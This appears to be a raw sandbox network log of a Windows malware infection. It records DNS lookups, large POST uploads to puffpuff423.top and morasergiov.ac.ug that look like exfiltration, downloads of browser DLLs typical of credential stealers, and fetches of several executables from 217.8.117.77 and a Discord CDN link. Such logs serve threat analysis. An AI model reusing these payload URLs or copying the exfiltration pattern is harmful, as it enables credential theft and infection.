Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sO29puUVeLtaFSMWZyibj0jDGg1M0sG8PH7fW86CWvlnvBvtOiPAbenHvCldrghiYnz8lhGcGoH9jY5bvXxKCquerMl%2Fp%2F3zTUA1dirVmAg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421fa5d9790bfd-AMS
-
Remote address:104.27.132.115:443RequestPOST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 593236
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d09627d8867e54ba2e922b58a2bb807011605707041; expires=Fri, 18-Dec-20 13:44:01 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32227e00000bfdf1863000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cxFVeS4rgNvlSSbbGDqkJUuG2%2BVeDSwi2revzLhpiTWqnfNTlshEgsIrNaL2WTo36ExCKJU87d9xbfP%2FjSrDycSrvDGG362i4EhC1rcJiIc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421fb0cfeb0bfd-AMS
-
Remote address:8.8.8.8:53Requestmorasergiov.ac.ugIN AResponsemorasergiov.ac.ugIN A217.8.117.77
-
Remote address:8.8.8.8:53Requestjamesrlongacre.ugIN AResponsejamesrlongacre.ugIN A217.8.117.77
-
Remote address:217.8.117.77:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: jamesrlongacre.ug
Content-Length: 101
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address:217.8.117.77:80RequestPOST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT
ETag: "217d0-58a9fc4382400"
Accept-Ranges: bytes
Content-Length: 137168
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT
ETag: "6b738-58a9fc4d0ba80"
Accept-Ranges: bytes
Content-Length: 440120
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT
ETag: "1303d0-58a9fc5a65a00"
Accept-Ranges: bytes
Content-Length: 1246160
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT
ETag: "14748-58a9fc6b90280"
Accept-Ranges: bytes
Content-Length: 83784
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address:217.8.117.77:80RequestPOST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 67541
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address:217.8.117.77:80RequestGET /ac.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:07 GMT
ETag: "7e000-5b44f64a37542"
Accept-Ranges: bytes
Content-Length: 516096
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /rc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:04 GMT
ETag: "d7d70-5b44f6472012d"
Accept-Ranges: bytes
Content-Length: 884080
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /ds1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:53 GMT
ETag: "57000-5b3c37b62707c"
Accept-Ranges: bytes
Content-Length: 356352
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /ds2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:52 GMT
ETag: "60e00-5b3c37b56c439"
Accept-Ranges: bytes
Content-Length: 396800
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestagentttt.ac.ugIN AResponseagentttt.ac.ugIN A79.134.225.40
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.136.232discord.comIN A162.159.135.232discord.comIN A162.159.128.233discord.comIN A162.159.137.232discord.comIN A162.159.138.232
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.135.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.130.233
-
GEThttps://cdn.discordapp.com/attachments/752128569169281083/778280249590939708/Klfn123FcIiEO8Bol.exeRemote address:162.159.133.233:443RequestGET /attachments/752128569169281083/778280249590939708/Klfn123 HTTP/1.1
Host: cdn.discordapp.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 602112
Connection: keep-alive
Set-Cookie: __cfduid=dee1b7db0691e11842db397be981b58c41605707074; expires=Fri, 18-Dec-20 13:44:34 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 5f422080ea520c75-AMS
Accept-Ranges: bytes
Age: 76286
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=Klfn123
ETag: "64913e7b57d36c1b93698ff1be8064ac"
Expires: Thu, 18 Nov 2021 13:44:34 GMT
Last-Modified: Tue, 17 Nov 2020 15:27:51 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
cf-request-id: 067d32a48d00000c75f6212000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1605626871303001
x-goog-hash: crc32c=Qy0Dkg==
x-goog-hash: md5=ZJE+e1fTbBuTaY/xvoBkrA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 602112
X-GUploader-UploadID: ABg5-UyDA5xCM-pZaX7gOQrQsl_FgXEcXLMqWzYqtDRAUnl5EUh6_V7jBmIQXv0xUZHl4ZSzHAqck9pTkrt3EDvOWzCmdOrd_g
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QjmzgtcLdI5KKv5876qTm11EFFN19c15RR7Gu9AP8Q7OoamNAyPKPAzmvKYNqpNmNPjDAzTOemtMlyTuuhaFolbKtCSUbj7%2FIxDIRnc%2F7BBHUiY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
Remote address:217.8.117.77:80RequestGET /axcjgfhwvvas.exe HTTP/1.1
Host: 217.8.117.77
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:25:11 GMT
ETag: "a6c00-5b3c31f77846f"
Accept-Ranges: bytes
Content-Length: 683008
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:195.201.225.248:443RequestGET /brikitiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:44:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=883f12999fc2fbd72c_2157886719445103115; expires=Thu, 19 Nov 2020 13:44:52 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000
-
Remote address:104.27.132.115:443RequestPOST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7fe953f893335af4bdd0b7f3ff3f33421605707094; expires=Fri, 18-Dec-20 13:44:54 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32f27500000b47d40f8000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mJyTKskUygX7gvdt60fehdCI3EbdfgevGDT4yU0Dhi7K%2Fk8z8bFoE%2Fg4ncHsbNubGvuR9ebpRq8mEKpy835R295UaPVc5l733uOq%2BhMYbxA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f4220fd8df30b47-AMS
-
GEThttps://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93cctxi.exeRemote address:104.27.132.115:443RequestGET //l/f/O_l-uHUB4qmE47arxwQ9/5eff69acfa0ae85a06df5a3b7662e7645e0e93cc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Set-Cookie: __cfduid=d3ab4ad0c42f82674f022657a3c6541fd1605707096; expires=Fri, 18-Dec-20 13:44:56 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-dfcff"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32fa1a00000b470c384000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aGtjLlVMlVHGQT07N8XA9IYmrwdQikySRlNwySHurV%2Fi2nYuxbME7UDAPtq98jNIxPvjlRqVPDtjQMFmOzylJz5fObdjiA%2Fh8VJTiC2gdls%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f422109c9f70b47-AMS
-
GEThttps://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6txi.exeRemote address:104.27.132.115:443RequestGET //l/f/O_l-uHUB4qmE47arxwQ9/fe8440f113bcec360cc6d6436c325f46774cadf6 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Set-Cookie: __cfduid=d5a6760798ec92c81e23291f8c9c80a541605707102; expires=Fri, 18-Dec-20 13:45:02 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-2b281b"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d330fed00000b47f39a6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=W0UVbEVNs2U0xKih8enEsADAyapW7JEVwH6e8zFXO4QhC%2FwjEBQ0qKqRuLO3p4V%2FwOvJmxoxvVaLKKyM0wKLTtlQad%2FaQfuQ1UWTw2hn9Zs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42212caca80b47-AMS
-
Remote address:104.27.132.115:443RequestPOST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 549760
Host: puffpuff423.top
ResponseHTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d92a3babe42c2fcd77f911fa7dc5fabc41605707138; expires=Fri, 18-Dec-20 13:45:38 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d339d2e00000b47c6bab000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5SLUT7YD1k9aeVDGSwERMINm7vT7b1yPMcnrIV5L65D4W5Y%2BpAP806uFGB6ZoFvT6ZhaYS1BlaZdMH21CTwp7oqMtq%2F7zQY4KLep15%2Fwfo4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42220ebf150b47-AMS
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpapple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:217.8.117.77:80RequestGET /oscjgfhwvvas.exe HTTP/1.1
Host: 217.8.117.77
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:25:09 GMT
ETag: "b0800-5b3c31f5bde5b"
Accept-Ranges: bytes
Content-Length: 722944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:217.8.117.77:80RequestGET /ac.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:07 GMT
ETag: "7e000-5b44f64a37542"
Accept-Ranges: bytes
Content-Length: 516096
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: jamesrlongacre.ug
Content-Length: 101
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:217.8.117.77:80RequestGET /rc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 17 Nov 2020 15:46:04 GMT
ETag: "d7d70-5b44f6472012d"
Accept-Ranges: bytes
Content-Length: 884080
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:217.8.117.77:80RequestGET /ds1.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:53 GMT
ETag: "57000-5b3c37b62707c"
Accept-Ranges: bytes
Content-Length: 356352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestGET /ds2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 217.8.117.77
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:52 GMT
ETag: "60e00-5b3c37b56c439"
Accept-Ranges: bytes
Content-Length: 396800
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:8.8.8.8:53Requestagentpurple.ac.ugIN AResponse
-
Remote address:217.8.117.77:80RequestPOST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:217.8.117.77:80RequestPOST /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
